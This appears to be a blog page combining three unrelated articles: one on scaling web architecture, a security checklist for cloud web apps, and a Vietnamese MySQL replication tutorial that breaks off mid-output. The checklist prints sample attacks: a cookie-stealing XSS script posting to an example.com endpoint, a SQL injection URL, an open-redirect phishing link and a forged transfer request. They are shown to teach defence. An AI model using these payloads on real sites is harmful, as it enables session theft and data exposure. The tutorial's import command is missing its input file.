Architecture of the scalability evolution - Single Server to a Global Audience

Kết quả hình ảnh cho scalability server aws

As a young engineer I used to build web applications that were hosted on a single server, and this is probably how most of us get started. During my career I have worked for different companies and I have witnessed applications in different scalability evolution stages. Before we go deeper into scalability, I would like to present some of these evolution stages to better explain how you go from a single server sitting under your desk to thousands of servers spread all over the world. I will keep it at a very high level here, as I will go into more detail in later chapters. Discussing evolution stages will also allow me to introduce different concepts and gradually move toward more complex topics. Keep in mind that many of the scalability evolution stages presented here can only work if you plan for them from the beginning. In most cases, a real-world system would not evolve exactly in this way, as it would likely need to be rewritten a couple of times. Most of the time, a system is designed and born in a particular evolution stage and remains in it for its lifetime, or manages to move up one or two steps on the ladder before reaching its architectural limits.

Single-Server Configuration 

Let’s begin with a single-server setup, as it is the simplest configuration possible and this is how many small projects get started. In this scenario, I assume that your entire application runs on a single machine. Figure 1-1 shows how all the traffic for every user request is handled by the same server. Usually, the Domain Name System (DNS) server is used as a paid service provided by the hosting company and is not running on your own server. In this scenario, users connect to the DNS to obtain the Internet Protocol (IP) address of the server where your website is hosted. Once the IP address is obtained, they send Hypertext Transfer Protocol (HTTP) requests directly to your web server. Since your setup consists of only one machine, it needs to perform all the duties necessary to make your application run. It may have a database management system running (like MySQL or Postgres), as well as serving images and dynamic content from within your application.


Figure 1-1 shows the distribution of traffic in a single-server configuration. Clients would first connect to the DNS server to resolve the IP address of your domain, and then they would start requesting multiple resources from your web server. Any web pages, images, Cascading Style Sheet (CSS) files, and videos have to be generated or served by your server, and all of the traffic and processing will have to be handled by your single machine. I use different weights of arrows on the diagram to indicate the proportion of traffic coming to each component. An application like this would be typical of a simple company website with a product catalog, a blog, a forum, or a self-service web application. Small websites may not even need a dedicated server and can often be hosted on a virtual private server (VPS) or on shared hosting

For sites with low traffic, a single-server configuration may be enough to handle the requests made by clients. There are many reasons, though, why this configuration is not going to take you far scalability-wise:
 ▶ Your user base grows, thereby increasing traffic. Each user creates additional load on the servers, and serving each user consumes more resources, including memory, CPU time, and disk input/output (I/O).
▶ Your database grows as you continue to add more data. As this happens, your database queries begin to slow down due to the extra CPU, memory, and I/O requirements.
▶ You extend your system by adding new functionality, which makes user interactions require more system resources.
▶ You experience any combination of these factors.

Making the Server Stronger: Scaling Vertically
There are a number of ways to scale vertically:
▶ Adding more I/O capacity by adding more hard drives in Redundant Array of Independent Disks (RAID) arrays. I/O throughput and disk saturation are the main bottlenecks in database servers. Adding more drives and setting up a RAID array can help to distribute reads and writes across more devices. In recent years, RAID 10 has become especially popular, as it gives both redundancy and increased throughput. From an application perspective, a RAID array looks like a single volume, but underneath it is a collection of drives sharing the reads and writes.
▶ Improving I/O access times by switching to solid-state drives (SSDs). Solid-state drives are becoming more and more popular as the technology matures and prices continue to fall. Random reads and writes using SSDs are between 10 and 100 times faster, depending on benchmark methodology. By replacing disks you can decrease I/O wait times in your application. Unfortunately, sequential reads and writes are not much faster and you will not see such a massive performance increase in real-world applications. In fact, most open-source databases (like MySQL) optimize data structures and algorithms to allow more sequential disk operations rather than depending on random access I/O. Some data stores, such as Cassandra, go even further, using solely sequential I/O for all writes and most reads, making SSD even less attractive.
▶ Reducing I/O operations by increasing RAM. (Even 128GB RAM is affordable nowadays if you are hosting your application on your own dedicated hardware.) Adding more memory means more space for the file system cache and more working memory for the applications. Memory size is especially important for efficiency of database servers.
▶ Improving network throughput by upgrading network interfaces or installing additional ones. If your server is streaming a lot of video/media content, you may need to upgrade your network provider’s connection or even upgrade your network adapters to allow greater throughput.
▶ Switching to servers with more processors or more virtual cores. Servers with 12 and even 24 threads (virtual cores) are affordable enough to be a reasonable scaling option. The more CPUs and virtual cores, the more processes that can be executing at the same time. Your system becomes faster, not only because processes do not have to share the CPU, but also because the operating system will have to perform fewer context switches to execute multiple processes on the same core.

Figure 1-2 shows the approximate relationship of price per capacity unit and the total capacity needed. It shows that you can scale up relatively cheaply first, but beyond a certain point, adding more capacity becomes extremely expensive. For example, getting 128GB of RAM (as of this writing) could cost you $3,000, but doubling that to 256GB could cost you $18,000, which is much more than double the 128GB price.


Isolation of Services
Vertical scalability is not the only option at this early stage of evolution. Another simple solution is moving different parts of the system to separate physical servers by installing each type of service on a separate physical machine. In this context, a service is an application like a web server (for example, Apache) or a database engine (for example, MySQL). This gives your web server and your database a separate, dedicated machine. In the same manner, you can deploy other services like File Transfer Protocol (FTP), DNS, cache, and others, each on a dedicated physical machine.

Cache is a server/service focused on reducing the latency and resources needed to generate the result by serving previously generated content. Caching is a very important technique for scalability.

Content Delivery Network: Scalability for Static Content
As applications grow and get more customers, it becomes beneficial to offload some of the traffic to a third-party content delivery network (CDN) service.


A content delivery network is a hosted service that takes care of global distribution of static files like images, JavaScript, CSS, and videos. It works as an HTTP proxy. Clients that need to download images, JavaScript, CSS, or videos connect to one of the servers owned by the CDN provider instead of your servers. If the CDN server does not have the requested content yet, it asks your server for it and caches it from then on. Once the file is cached by the CDN, subsequent clients are served without contacting your servers at all.


Distributing the Traffic: Horizontal Scalability 

All of the evolution stages discussed so far were rather simple modifications to the single-server configuration. Horizontal scalability, on the other hand, is much harder to achieve and in most cases it has to be considered before the application is built. In some rare cases, it can be “added” later on by modifying the architecture of the application, but it usually requires significant development effort. I will describe different horizontal scalability techniques throughout this book, but for now, let’s think of it as running each component on multiple servers and being able to add more servers whenever necessary. Systems that are truly horizontally scalable do not need strong servers—quite the opposite; they usually run on lots and lots of cheap “commodity” servers rather than a few powerful machines.





Scalability for a Global Audience
The largest of websites reach the final evolution stage, which is scalability for a global audience. Once you serve millions of users spread across the globe, you will require more than a single data center. A single data center can host plenty of servers, but it causes clients located on other continents to receive a degraded user experience. 

GeoDNS is a DNS service that allows domain names to be resolved to IP addresses based on the location of the customer. Regular DNS servers receive a domain name, like yahoo.com, and resolve it to an IP address, like 206.190.36.45. GeoDNS behaves the same way from the client’s perspective.

Edge cache is a HTTP cache server located near the customer, allowing the customer to partially cache the HTTP traffic. Requests from the customer’s browser go to the edge-cache server. The server can then decide to serve the page from the cache, or it can decide to assemble the missing pieces of the page by sending background requests to your web servers. It can also decide that the page is uncacheable and delegate fully to your web servers. Edge-cache servers can serve entire pages or cache fragments of HTTP responses. 






A load balancer is a software or hardware component that distributes traffic coming to a single IP address over multiple servers, which are hidden behind the load balancer. Load balancers are used to share the load evenly among multiple servers and to allow dynamic addition and removal of machines. Since clients can only see the load balancer, web servers can be added at any time without service disruption.

The second layer of our stack is the web application layer. It consists of web application servers (4) responsible for generating the actual HTML of our web application and handling clients’ HTTP requests. These machines would often use a lightweight (PHP, Java, Ruby, Groovy, etc.) web framework with a minimal amount of business logic, since the main responsibility of these servers is to render the user interface. All the web application layer is supposed to do is handle the user interactions and translate them to internal web services calls. The simpler and “dumber” the web application layer, the better. By pushing most of your business logic to web services, you allow more reuse and reduce the number of changes needed, since the presentation layer is the one that changes most often.

The third layer of our stack consists of web services (7). It is a critical layer, as it contains most of our application logic. We keep front-end servers simple and free of business logic since we want to decouple the presentation layer from the business logic. By creating web services, we also make it easier to create functional partitions. We can create web services specializing in certain functionality and scale them independently. For example, in an e-commerce web application, you could have a product catalog service and a user profile service, each providing very different types of functionality and each having very different scalability needs.

Both front-end servers (4) and web services (7) should be stateless, web applications often deploy additional components, such as object caches (5) and message queues (6). Object cache servers are used by both front-end application servers and web services to reduce the load put on the data stores and speed up responses by storing partially precomputed results. 

Data persistence layer (8) and (9). This is usually the most difficult layer to scale horizontally, so we’ll spend a lot of time discussing different scaling strategies and horizontal scalability options in that layer. This is also an area of rapid development of new technologies labeled as big data and NoSQL, 

The data layer has become increasingly more exciting in the past ten years, and the days of a single monolithic SQL database are gone. As Martin Fowler says, it is an era of polyglot persistence, where multiple data stores are used by the same company to leverage their unique benefits and to allow better scalability. 


Overview of the Application Architecture
So far, we’ve looked at the infrastructure and scalability evolution stages. Let’s now take a high-level look at the application itself. The application architecture should not revolve around a framework or any particular technology. Architecture is not about Java, PHP, PostgreSQL, or even database schema. Architecture should evolve around the business model. There are some great books written on domain-driven design and software architecture1–3 that can help you get familiar with best practices of software design. To follow these best practices, we put business logic in the center of our architecture. It is the business requirements that drive every other decision. Without the right model and the right business logic, our databases, message queues, and web frameworks are useless. Moreover, it is irrelevant if the application is a social networking website, a pharmaceutical service, or a gambling app—it will always have some business needs and a domain model. By putting that model in the center of our architecture, we make sure that other components surrounding it serve the business, not the other way around. By placing technology first, we may get a great Rails application, but it may not be a great pharmaceutical application.t1

A domain model is created to represent the core functionality of the application in the words of business people, not technical people. The domain model explains key terms, actors, and operations, without caring about technical implementation. The domain model of an automated teller machine (ATM) would mention things like cash, account, debit, credit, authentication, security policies, etc. At the same time, the domain model would be oblivious to hardware and software implementation of the problem. The domain model is a tool to create our mental picture of the business problems that our application is supposed to solve



The front end should have a single responsibility of becoming the user interface. The user can be interacting with the application via web pages, mobile applications, or web service calls. No matter what the actual delivery mechanism is, the front-end application should be the layer translating between the public interface and internal service calls. The front end should be considered as “skin,” or a plugin of the application, and as something used to present the functionality of the system to customers. It should not be considered a heart or the center of the system

Front-end code will be closely coupled to templates and the web framework of our choice (for example, Spring, Rails, Symfony). It will be constrained by the user interface, user experience requirements, and the web technologies used. Frontend applications will have to be developed in a way that will allow communication over HTTP, including AJAX and web sessions. By hiding that within the front-end layer, we can keep our services layer simpler and focused solely on the business logic, not on the presentation and web-specific technologies. Templating, web flows, and AJAX are all specific problems. Keeping them separated from your main business logic allows for fast and independent changes. Having the front end developed as a separate application within our system gives us another advantage: we can use a different technology stack to develop it. It is not unreasonable to use one technology to develop web services and a different one to develop the front-end application. 

As an example, you could develop the front end using Groovy, PHP, or Ruby, and web services could be developed in pure Java.

Web services are where most of the processing has to happen, and also the place where most of the business logic should live. 



Minimum Viable Security Checklist for a Cloud-Based Web Application

Kết quả hình ảnh cho Security
This article is written for lone developers or small teams who are interested in making sure they have their bases covered from a security perspective. The focus is mostly on dynamic web applications hosted on cloud services like Amazon Web Services (AWS) or Google Cloud Platform (GCP). It is not meant as an exhaustive guide, just a list of low hanging fruit that you can easily do early on to prevent most major, obvious software security issues.
I’ve organized the guide by starting with the network layer and moving up to the application, since that seems to be how most penetration tests and real world attacks progress.

1. Close All Unnecessary Ports on Your Web Servers

Every open port on a host is a potential foothold into your systems for a remote attacker. Nowadays it’s trivial for an attacker to scan thousands of ports across a wide range of IPs looking for known versions of insecure services (a technique called “banner grabbing”). Once they’ve find a few entry points, it’s easy to search for and run exploits against those services to gain access to the machine.
The operating system of your web server’s VM may come with all sorts of default service – to be helpful! These may include things like FTP servers, proxy servers and more – but if you’re not interesting in securing, patching and maintaining those service over time, make sure they’re turned off and hidden from the outside world.
You could use something on the server like iptables, or you could rely on your cloud server provider’s firewall product to disallow all traffic to your web servers that’s not on the default ports for HTTP (80) or SSL (443).
If you need to leave SSH open for manual server administration, move that to a non-standard port (something besides port 22) to avoid naive crawlers and script kiddies constantly banging on the door.

2. Properly Secure the SSH Connections to Your Web Servers

One day, when you’re a big company with a huge cloud infrastructure team, you’ll have all sorts of automation setup and you won’t ever need to manually administer servers over SSH. You’ll treat them like cattle, not pets.
But until then, you’re likely going to need SSH access to your machines for manual configuration changes as your infrastructure is still maturing. That’s okay, but here’s how to do it safely.
First things first, you should disable root login. The root user is the biggest target for attackers since it is simultaneously (1) the most common username across servers and it also (2) has the most privileged system access. This makes root a goldmine for anyone trying to gain access to your web servers.
Disabling root SSH access is as simple as adding the following line to the end of your /etc/ssh/sshd_config file on the server:
PermitRootLogin no
While you’re in that file, it’s also a great idea to disable password authentication for SSH connections altogether. You can do that by adding the following line (it may already be there and you simply need to un-comment it).
PasswordAuthentication no
Instead, you should be using public keys to control SSH access. If you’ve never used public keys for anything before, it does take a bit of work to setup initially, but it’s very secure and much easier to manage in the long run.
Make sure you add your machine’s own public key to the ~/.ssh/authorized_keys file for the SSH user you’ll be using. This also makes it easy to revoke someone’s access down the line. Simply remove their laptop’s public key from the ~/.ssh/authorized_keys file and they’ll be locked out, no need to rotate SSH passwords and force everyone else to change.

3. Hide Your Backing Services from the Internet

If you’re following my MVP scalable architecture (which you should be!), you’ll have your database server running on a separate host from your web server(s). You want to ensure that your application’s backing services – like the database, and any caching layers like redis or memcached – cannot be accessed by someone outside your trusted network.
At the very least, drop all traffic that isn’t coming from a whitelist of your web servers’ IP addresses. However, this can quickly become a pain to maintain manually if you’re adding or removing web servers a lot.
An even better approach is to put all of the backing services hosts in a private network that can’t be seen from outside of the network. You can usually set this up as a Virtual Private Cloud (VPC) with any cloud provider like Google Cloud or AWS.
In fact, this is the exact use-case that AWS spells out for a VPC on their marketing homepage:
For example, you can create a public-facing subnet for your web servers that has access to the Internet, and place your backend systems such as databases or application servers in a private-facing subnet with no Internet access.
Note that you should still be using passwords to access backing services on top of all of this, in case an attacker enters your network, as an extra layer of defense.

4. Never Serve Files Off the Web Server’s File System

There’s really no reason you should ever be serving files directly off of the file system from your web servers these days.
There are all sorts of ways to accidentally misconfigure things and allow anyone to traverse the source code or other contents of your web server’s file system. Save yourself the headache and avoid using things like nginx’s root directive or Apache’sDocumentRoot directive in your frontend web server. In fact, the nginx docs on “common mistakes” specifically lists a few bad uses of the root directive – take heed!
This is a performance recommendation as much as it as a security recommendation. Static resources like CSS, javascript and images that belong to your application should be hosted on a more-fitting static file host like AWS S3 or Google’s Cloud Storage.

5. Serve User Generated Content on a Different Domain

Continuing the last point, the other place where applications can get into trouble with serving static files is when they’re serving user-generated content like uploaded profile pictures or document attachments.
Make sure you serve any user-uploaded content from a completely different domain from your main application. Many big sites already do this:
  • facebook uses fbcdn.net
  • github uses githubusercontent.com
  • twitter uses pbs.twimg.com
If users can upload HTML documents and have them hosted on your application’s primary domain, that’s an excellent way to setup phisihing opportunities for attackers. Serving user content from your domain can also fool users into thinking malicious content is actually legitimate content from your company, as the FCC found out last fall.
Users could upload malicious javascript that would be run by the browser with the same trust level as your application’s javsacript code, allowing it to tamper with your site’s cookies and potentially steal user’s credentials, sessions or other data.

6. Avoid SQL Injections (SQLI) By Properly Using an ORM

For the transactional needs of the average relational database, there’s no reason not to be using an Object Relational Mapper (ORM) to interface with your database.
An ORM saves you from having to write a ton of boilerplate code for mundane tasks like generating SQL statements and turning database rows into objects you can work easily work with in code.
From a security standpoint, an ORM will also save you from SQL injection attacks (SQLI), where a malicious user might try to extract information from your database by creating malicious payloads.
Imagine a web application with a URL like: http://example.com/user/123. The code that runs on a request for that page will probably grab the user ID from the URL and use it to look up the user, running a SQL query that looks like
SELECT * FROM users WHERE id = 123
Now imagine a malicious user were to navigate to a specially crafted URL such as http://example.com/user/NULL+OR+1=1. Without proper escaping, the server would generate a SQL expression like this and send that off to the database.
SELECT * FROM users WHERE id = NULL OR 1=1
Because of the “OR 1=1”, that WHERE clause would match every single row in the user’s table, meaning the database would return a list of every user and the results may be rendered to the page. Not ideal!
An ORM would turn that into the following safe query, which would simply match no rows.
"SELECT * FROM users WHERE id = %s", ("NULL OR 1=1")
If you do have a special use-case that your ORM doesn’t support and you find yourself having to write raw SQL, always ensure that you’re using prepared statements or parameterized queries and never manually building SQL statements with string concatenation or variable substitution.

7. Avoid Cross-Site Scripting (XSS) by Using an HTML Template Library

You should be using a template library for rendering HTML documents and automatically escaping HTML characters. Like an ORM, a good template library not only save you the hassle of writing lots of boilerplate code, it also add some security benefits.
In any dynamically generated web application, user-generated content will be mixed in directly with the HTML you’ve written for your application to render the page.
Without proper XSS filters, a user could set their username to something like the following (what a mouthful!):
<script>i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();</script>
Then, whenever a user navigated to that attacker’s profile, your backend would combine that “username” with the rest of the HTML on the page. The attacker’s payload would be run and trusted by the user’s browser as if it were javascript from your application and users would unknowingly have their session cookies sent to an attacker’s server. Not ideal!
A proper template library would turn the above code into
&lt;script&gt;i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();&lt;/script&gt;
rendering it invalid as an HTML <script> tag and harmless (and weird looking) to users.
From time to time, you may find yourself needing to disable the default escaping in order to leave information properly formatted for the frontend, maybe if you’re “rendering” some JSON on the server in order to pass it to javascript on the frontend.
Admittedly, I wrote a security bug at one point for a client doing the same thing. While we were initially only passing “trusted” content that I assumed would be safe to render, over time the page evolved and we added some user-generated content to that JSON, that created a potential XSS vulnerability.
XSS bugs are the most common type of security vulnerabilities across all industries according to Hacker One’s latest report and they can sneak in over time if you’re not careful.

8. Hash and Salt Your Users’ Passwords

If this is the first time you’re hearing someone someone say this, you should hang out on web development forums more often because this is one of the most common – and costly – mistake made by new or junior web developers.
There’s no reason to ever store your user’s passwords in plaintext in your database. The current state of the art is to add a random, unique salt to each password and then hash it with bcrypt thousands of times. But really, you should use a library for this that comes with sane defaults.
Never try to build your own crypto systems, and that goes for password security as well.

9. Require Your Users to Create Strong Passwords

This one may not seem like it should be part of an application or network security checklist – if the user makes a bad password and gets hacked, that’s their fault! Right?
If users are getting their accounts compromised, it’s going to reflect poorly on your application, regardless of whose fault it is.
Forget about funky password requirements like mixing cases, requiring numbers, or anything complex like that. Those are old standards that are now outdated.
Instead, set a minimum length of something like 8-12 characters (no max length limit – we are storing fixed-length hashes (#8) in our DB, after all!) and then check any new passwords against a database of the most common passwords found in breaches.
That should take all of one hour to implement and will help minimize the success of any brute-force password guessing attacks against your product.

10. Serve Your Site Over SSL

Serving your site over SSL protects your site’s users from having their connections tampered with – either by an attacker on their network (say, a public wifi hotspot) or some intermediary along the line, like a rogue Internet Service Provider (ISP).
If you’re not familiar with how SSL works, you can learn what you need to know here. Serving your site over SSL also has SEO benefits as Google has said it uses SSL (as well as page load time) as a ranking signal when deciding what sites to return in the results for a query.
You can get a free SSL certificate from Let’s Encrypt and it takes only a few minutes to setup with their certbot, so the benefits far outweigh the minimal costs of setting one up.
This is much easier if you simply start by serving your site over SSL from day #1 versus trying to move to it down the line, since you’ll catch any mixed content warnings as you’re adding new content to the site over time, instead of having to go back and catch them all at once if you move to SSL later on.

11. Don’t Use Cookies for Session Storage

Server-side sessions are a common feature of many web application frameworks. The idea is you can tuck some information “into the session” and it will be available again later for subsequent requests from that same user.
By default, some session implementations simply store the session values that your application sets in a cookie on the user’s browser, maybe base64 encoding it for “obfuscation” purposes.
But if you’re putting anything remotely sensitive in your session (say, the currently logged in user’s ID), then you don’t want to be trusting a user-editable cookie for something like that. A user could edit the cookie to change the ID and suddenly your application will give them access to another user’s account. Not ideal!
Instead, make sure you’ve configured a proper server-side session storage backend – something like a database or a cache service – and keep the session data in there.
You’ll still likely need to use cookies, but there’s an important distinction between using cookies to identify a user’s session versus using them to store information about the session.
In an ideal setup, you’ll simply set a cookie in the user’s browser called “session_id” and it will contain some long, unique value (like a UUID) that will be that user’s unique session identifier. When a request comes in, your session management system should look up that user’s session information in a backend system (like a database or cache) using the session ID in the cookie.
You should make sure to inspect the cookies that your site is generating – login using an incognito browser to see what ends up getting set as you browse the site and perform various tasks. You shouldn’t see anything valuable sent to or from the browser.

12. Don’t Allow Open Redirects

Any page of your application that can respond with a redirect (say, a login page or error page) should never blindly redirect a user to a fully qualified URL. Instead, try to return a path-only Location header that keeps the user on the same domain.
The vulnerability here is that a malicious user could create a targeted phishing campaign against your site. They could setup a copy of your site on a different domain and then send someone a link to the open redirector page on your site with a query argument that redirects to the attacker’s site.
Since users usually scan the domain but not the query arguments when deciding to trust a link, they’ll think the link is legitimate even though you redirected them to an attacker’s website.
This attack is particularly sneaky if it comes after a login page. Imagine someone sent one of your users a link to the following URL:
http://example.com/login?next=http%3A%2F%2Fattacker.com%2Fphishing-page.php
The user would be taken to your actual login page, where they would successfully login, and then be redirected to the next query argument – which, in this case, takes them off your site to a page an attacker is controlling.
If the attacker sets it up to look like your site, the user may be none the wiser if they don’t check the URL bar after logging in, and may be tricked into giving up information (“Please enter your password one more time…”).

13. Use CSRF Tokens on Important Form Submissions

As the name implies, a “Cross-Site Request Forgery” is when an attacker on one site is able to trick a user into submitting a forged request on your site without the user realizing.
The canonical example is a bank transfer. If you’re a bank and you allow users to transfer funds with a request like
GET http://www.example.com/transfer_funds?amt=500&to_acct=12345
then a malicious attacker could simply embed a link like that somewhere innocuous (“Click here to win a free iPad!”, on facebook). If a logged-in user of your site sees the link on another site and clicks on it, then they will have transferred the funds before they even realize what has happened.
The way you prevent this from happening on your site is by including so-called “CSRF tokens” in your forms. The basic implementation is that you generate a random CSRF token when you load the page that asks the user to submit or confirm some sort of transaction. You would hide this value in the HTML of the form using something like:
<input type="hidden" name="csrf_token" value="..." />
Then, when the user submits the form to confirm the transaction, you would check for both the presence of the CSRF token, and whether or not it matches the previously set value before allowing the request to process. In this way, an attacker embedding the example “bank transfer” link would hit a dead end, since your application would reject the request since it doesn’t have a correct CSRF token value.

If you follow these steps, you will have a very secure base for launching and growing your product. All of your application’s data will be hidden from the public internet and your web servers will be locked down to only handle very specific types of traffic.
Your application will be secure against the most common vulnerabilities as well as some newer, more targeted phishing campaigns. Your will be taking solid precautions to safeguard your users’ data and creating a secure experience for them in your app.
As your application begins to process a greater number of users and their data, there will be additional security steps you’ll want to think about down the line, but these steps that I’ve listed are the most basic ones that are easy to setup and should last you for a long time.
If you’re interested in learning more about securing web applications, I’d be remiss if I didn’t tell you about the Open Web Application Security Project (WASP) “Top 10” guidelines that came out last year, although I’ve found it’s a bit too obtuse to be of much practical use to a lone developer or a small software team.

Cấu hình MySQL Replication (Master - Slave)




Thế nào là MySQL Replication?

Là quá trình cho bạn dễ dàng tạo ra nhiều bản sao lưu của MySQL Database bằng cách sao chép chúng một cách từ động từ Master đến Slave. Điều này là rất hữu ích vì nhiều lý do, bao gồm cả việc tạo cho bạn một bản sao lưu dữ liệu dự phọng cho trường hợp rủi ro xảy ra; cũng là một cách để bạn có thể phân tích dữ liệu mà không sử dụng cơ sở dữ liệu chính (Master) làm ảnh hưởng đến system performance hoặc đơn giản như một phượng tiện để mở rộng quy mô.
Hướng dẫn này giới thiệu tới bạn cấu hình MySQL Replication với 01 Master và 01 Slave.


Tài liệu tham khảo

https://manhtuong.net/can-bang-tai-cho-mysql/

Làm thế nào để cấu hình MySQL Replication?

Bài viết sử dụng 02 máy chủ có địa chỉ IP:
  • 10.10.10.1 - Master Database
  • 10.10.10.2 - Slave Database
  • CentOS 6.6

Cấu hình MySQL Master

Bước 1: cài đặt MySQL
sudo yum install mysql-server mysql-client  
Bước 2: tạo bản sao lưu dự phòng cho file cấu hình gốc MySQL /etc/my.conf
cp /etc/my.conf /etc/my.conf.orig  
Bước 3: bắt đầu cấu hình MySQL Master, thay đổi cấu hình này nằm ở phần [mysqld]. Bạn có thể chọn bất kỳ một con số tự nhiên nào cho server-id và đây là con số duy nhất, không trùng với server-id trong MySQL Replication của bạn. Tôi khuyến nghị bạn chọn 1
  • Đây là số tự nhiên đầu tiên, nó thích hợp một cách tự nhiên và dễ nhớ để bắt đầu.
  • Sẽ khó bị quên hơn với 1 là server-id của MySQL Master. Từ sau đó là server-id của Slave
  • Bạn là người đầu tiên lolz
Thêm đoạn sau vào phần [mysqld]
# Enable binary logging & Replication
server_id           = 1  
log_bin             = /home/mysql/data/mysql-bin.log  

Đây là phần gốc rễ để sao lưu Database từ MySQL Master tới MySQL Slave. MySQLSlave sẽ sao chép tất cả những thay đổi có trong log_bin.
Nếu muốn lựa chọn Database sẽ sao chép sang MySQL Slave. Bạn cần thêm dòng sau
binlog_do_db = newdatabase
Bạn có thể thêm nhiều hơn một database bằng cách lặp lại dòng này cho tất cả Database bạn cần sao lưu.
Bước 4: Để áp dụng thay đổi, bạn cần restart MySQL Service
$sudo service mysqld restart
Bước 5: Giờ là lúc mở MySQL shell để làm tiếp
mysql -uroot -p
Bước 6: Bạn cần phân quyền cho MySQL Slave bằng cách tạo một slave_user và phân quyền cho slave_user này.
GRANT REPLICATION SLAVE ON *.* TO 'slave_user'@'10.10.10.2' IDENTIFIED BY 'password';  
FLUSH PRIVILEGES;  
Bước 7: Cần một chút tinh xảo từ bạn, và cẩn thận. Bạn mở một cửa sổ terminal mới, đăng nhập vào MySQL Master, đăng nhập vào MySQL shell.
Tại đây, do Database được chọn là newdatabase nên bạn cần chuyển tới newdatabase
USE newdatabase;  
Tiếp theo, bạn lock database để ngăn chặn bất kỳ thay đổi có thể xảy ra với newdatabase
FLUSH TABLES WITH READ LOCK;  
Tiếp theo, bạn gõ:
SHOW MASTER STATUS;  
Bạn sẽ nhìn thấy một bảng thông tin tương tự như dưới
mysql> SHOW MASTER STATUS;  
+------------------+----------+--------------+------------------+----------------+
| File             | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set
+------------------+----------+--------------+------------------+----------------+
| mysql-bin.003894 | 44121282 |              |                  |      
+------------------+----------+--------------+------------------+----------------+
1 row in set (0.00 sec)

mysql>  
Đây là log_bin và vị trí mà MySQL Slave sẽ bắt đầu sao lưu. Bạn cần ghi lại hai thông số File và Position. Lát nữa bạn sẽ dùng chúng.
Nếu bạn có bất kỳ thay đổi, gõ lệnh nào ở cửa sổ MySQL shell này, Database sẽ tự động unlock. Do đó, bạn cần mở tiếp một cửa sổ mới cho bước tiếp theo.
Bước 8: Bạn sẽ export database sử dụng mysqldump ở cửa sổ terminal mới. Hãy đảm bảo bạn đang ở bash shell terminal, không phải MySQL shell.
mysqldump -uroot -p --default-character-set=utf8 --opt newdatabase > newdatabase.sql  
Bước 9: Giờ là lúc bạn quay lại cửa sổ MySQL shell mà bạn FLUSH TABLES WITH READ LOCK;, gõ vào lệnh sau để unlock
UNLOCK TABLES;  
QUIT;  
Tới đây bạn đã hoàn thành cấu hình MySQL Master Database.

Cấu hình MySQL Slave

Bước 1: Bạn login vào máy chủ MySQL Slave, và mở cửa sổ MySQL shell. Bạn tạo mới newdatabase. Đây là Database bạn sẽ sao chép từ MySQL Master
CREATE DATABASE newdatabase CHARACTER SET utf8;  
EXIT;  
Bước 2: Import database mà bạn đã Export ở Bước 8: của Cấu hình MySQL Master
mysql -uroot -p --default-character-set=utf8 newdatabase  
Bước 3: bây giờ bạn cấu hình MySQL Slave. Trước khi bắt đầu, hãy backup cấu hình MySQL nguyên bản.
$sudo cp /etc/my.conf /etc/my.conf.orig
Bước 4: cấu hình MySQL Slave. Tôi đã nói với bạn về server-id ở Bước 3: của Cấu hình MySQL Master. Và gán server-id của MySQL Master là 1, giờ bạn gán 2 cho MySQL Slave vào phần [mysqld]
server-id = 2  
Bước 5: thêm những dòng sau vào sau server-id = 2
relay-log               = /var/log/mysql/mysql-relay-bin.log  
log_bin                 = /var/log/mysql/mysql-bin.log  
binlog_do_db            = newdatabase  
Bước 6: restart MySQL Service để áp dụng thay đổi.
$sudo service mysqld restart
Bước 7: tiếp theo, bạn mở cửa sổ MySQL shell. Và gõ vào đó dòng sau đây
CHANGE MASTER TO MASTER_HOST='10.10.10.1',MASTER_PORT=3307,MASTER_USER='slave_user', MASTER_PASSWORD='password', MASTER_LOG_FILE='mysql-bin.003894', MASTER_LOG_POS=  44121282;  
Dòng trên làm những việc sau:
  • Nó chỉ định máy chủ hiện tại là MySQL Slave của MySQL Master (IP 10.10.10.1)
  • Nó cung cấp thông tin đăng nhập vào MySQL Master
  • Cuối cùng, nó cho MySQL Slave biết vị trí để bắt đầu sao chép
Bước 8: activate MySQL Slave.
START SLAVE;  
Bước 9: giờ là lúc bạn xem MySQL Slave vừa cấu hình đã hoạt động chưa? hoạt động thế nào? Bạn mở cửa sổ MySQL shell và gõ lệnh
mysql> show slave status\G;  
*************************** 1. row ***************************
               Slave_IO_State: Waiting for master to send event
                  Master_Host: 10.10.10.1
                  Master_User: slave_user
                  Master_Port: 3307
                Connect_Retry: 60
              Master_Log_File: mysql-bin.003908
          Read_Master_Log_Pos: 70419921
               Relay_Log_File: mysqld-relay-bin.000028
                Relay_Log_Pos: 70420084
        Relay_Master_Log_File: mysql-bin.003908
             Slave_IO_Running: Yes
            Slave_SQL_Running: Yes
              Replicate_Do_DB: 
          Replicate_Ignore_DB: 
           Replicate_Do_Table: 
       Replicate_Ignore_Table: 
      Replicate_Wild_Do_Table: 
  Replicate_Wild_Ignore_Table: 
                   Last_Errno: 0
                   Last_Error: 
                 Skip_Counter: 0
          Exec_Master_Log_Pos: 70419921
              Relay_Log_Space: 70420305
              Until_Condition: None
               Until_Log_File: 
                Until_Log_Pos: 0
           Master_SSL_Allowed: No
           Master_SSL_CA_File: 
           Master_SSL_CA_Path: 
              Master_SSL_Cert: 
            Master_SSL_Cipher: 
               Master_SSL_Key: 
        Seconds_Behind_Master: 0
Master_SSL_Verify_Server_Cert: No  
                Last_IO_Errno: 0
                Last_IO_Error: 
               Last_SQL_Errno: 0
               Last_SQL_Error: 
  Replicate_Ignore_Server_Ids: 
             Master_Server_Id: 1
                  Master_UUID: 97fcc20f-9ed8-11e6-9eaa-0025903d1878
             Master_Info_File: /home/mysql/data/master.info
                    SQL_Delay: 0
          SQL_Remaining_Delay: NULL
      Slave_SQL_Running_State: Slave has read all relay log; waiting for the slave I/O thread to update it
           Master_Retry_Count: 86400
                  Master_Bind: 
      Last_IO_Error_Timestamp: 
     Last_SQL_Error_Timestamp: 
               Master_SSL_Crl: 
           Master_SSL_Crlpath: 
           Retrieved_Gtid_Set: 
            Executed_Gtid_Set: 
                Auto_Position: 0
1 row in set (0.00 sec)

ERROR:  
No query specified

mysql>  

Những lỗi có thể xảy ra

Trong quá trình replication giữa MySQL Master và MySQL Slave có thể bị gián đoạn vì lỗi sao lưu dữ liệu. Một số lỗi xảy ra như 1062, 1452, 1050, 1146, 1356, 1054, 1060, 1406
mysql> show slave status\G;  
*************************** 1. row ***************************
               Slave_IO_State: Waiting for master to send event
                  Master_Host: 10.10.10.1
